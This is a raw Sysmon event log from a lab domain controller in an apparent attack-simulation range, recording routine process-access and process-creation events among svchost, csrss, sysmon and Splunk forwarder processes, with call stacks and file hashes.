13:18:16.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4498-6000-1B01-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4498-6000-1B01-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.427{08A6967A-4498-6000-1B01-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.911{08A6967A-4499-6000-1C01-000000009A01}43484608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4499-6000-1C01-000000009A01}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4499-6000-1C01-000000009A01}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.770{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4499-6000-1C01-000000009A01}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:17.771{08A6967A-4499-6000-1C01-000000009A01}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.583{08A6967A-449A-6000-1D01-000000009A01}39765104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-449A-6000-1D01-000000009A01}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:18.442{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 